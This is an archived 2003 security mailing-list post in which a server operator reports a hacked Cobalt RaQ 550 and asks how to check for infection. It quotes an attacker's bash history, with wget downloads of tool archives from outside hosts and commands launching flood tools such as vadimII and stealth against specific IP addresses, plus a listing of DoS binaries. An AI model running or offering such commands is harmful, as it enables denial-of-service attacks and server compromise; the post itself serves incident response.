[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-security] raq 550 hacked
- Subject: [cobalt-security] raq 550 hacked
- From: "Tik & Klik Internetdiensten" <info@xxxxxxxxxx>
- Date: Mon, 6 Oct 2003 21:14:01 +0200
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
Hello,
this weekend it looks like a raq 550 of mine whas hacked.
i tracked some processes that was flooding.
the program was called vladimII
it was runned on the name of a user that had ssh access.
when i blocked this user it started a day later with a nother user.
this 2 users are from different sites on the same machine.
But these 2 users are fronm the same person.
tracking the ip's i came out in Washington
but the user is dutch so it looks like someone hacked his computer to
retreive his passwords ?
Is there a way to look if the raq is infected or that blokking this user to
ssh will be enough
the program was russing whas in the /home/tmp dir in the map flood, a list
is below.
the file broadcast.txt has 2102 ip's in it.
i also have saved the bash history of the 2 users.
there are several programs that was downloaded to my server.
i shorted the bash to the progroms that was downloaded below this mail
please advice
----------
-rwxr-xr-x 1 xxx users 22446 Feb 9 2001 alpha
-rwxr-xr-x 1 xxx users 23521 Aug 17 2000 bloop
-rw-r--r-- 1 xxx users 31909 Aug 22 2001 broadcast.txt
-rwxr-xr-x 1 xxx users 26981 May 9 01:10 cw
-rwxr-xr-x 1 xxx users 2250 Apr 11 2001 da.sh
-rwxr-xr-x 1 xxx users 24747 Mar 10 1996 juno
-rwxr-xr-x 1 xxx users 25285 Aug 17 2000 nestea
-rwxr-xr-x 1 xxx users 24577 Oct 3 2000 overdrop
-rwxr-xr-x 1 xxx users 22803 Oct 17 2000 rc8
-rwxr-xr-x 1 xxx users 28910 Sep 7 2000 s
-rwxr-xr-x 1 xxx users 24786 Mar 10 1996 sl
-rwxr-xr-x 1 xxx users 17027 Feb 9 2001 sl2
-rwxr-xr-x 1 xxx users 17027 Mar 2 2001 sl3
-rwxr-xr-x 1 xxx users 17027 Aug 22 2001 slice2
-rwxr-xr-x 1 xxx users 14883 May 13 2001 slice3
-rwxr-xr-x 1 xxx users 33962 Oct 17 2000 smack
-rwxr-xr-x 1 xxx users 31558 Feb 18 2001 smurf5
-rwxr-xr-x 1 xxx users 39382 Sep 7 2001 smurf6
-rw-r--r-- 1 xxx users 19008 Aug 22 2001 smurf6-linux+LPG.c
-rwxr-xr-x 1 xxx users 22158 Aug 6 2000 stealth
-rwxr-xr-x 1 xxx users 15087 May 13 2001 stream
-rwxr-xr-x 1 xxx users 15151 May 13 2001 stream2
-rwxr-xr-x 1 xxx users 23011 Jul 10 00:07 super
-rwxr-xr-x 1 xxx users 23671 May 13 2001 synhose
-rwxr-xr-x 1 xxx users 26449 Feb 7 1996 synk
-rwxr-xr-x 1 xxx users 15687 May 13 2001 synk7
-rwxr-xr-x 1 xxx users 16519 May 13 2001 synsend
-rwxr-xr-x 1 xxx users 23587 May 13 2001 trash
-rwxr-xr-x 1 xxx users 26252 May 13 2001 trash2
-rwxr-xr-x 1 xxx users 22741 Nov 8 2000 udp
-rwxr-xr-x 1 xxx users 22446 Aug 22 2001 vadimI
-rwxr-xr-x 1 xxx users 2635 Aug 22 2001 vadimI.c
-rwxr-xr-x 1 xxx users 23414 Jun 25 21:52 vadimII
-rwxr-xr-x 1 xxx users 13607 May 13 2001 xdestroy
-rwxr-xr-x 1 xxx users 15119 May 13 2001 xshock
-----
bash history
wget www.ps-lov.us/pizda.tgz
wget snow.prohosting.com/muiemuie/p.tar.gz
wget snow.prohosting.com/muiemuie/p.tgz
wget snow.prohosting.com/muiemuie/km3.tgz
wget 65.113.119.133/muiemuie/km3.tgz
its runns programs like
./super 69.65.48.23 53 nasa.gov
./vadimII 210.0.204.185 53 100000000000000000000000000000000000000 0
./cw 210.0.204.185
./stealth 210.0.204.185 6500000000000
./super 64.207.19.6 53 nasa.gov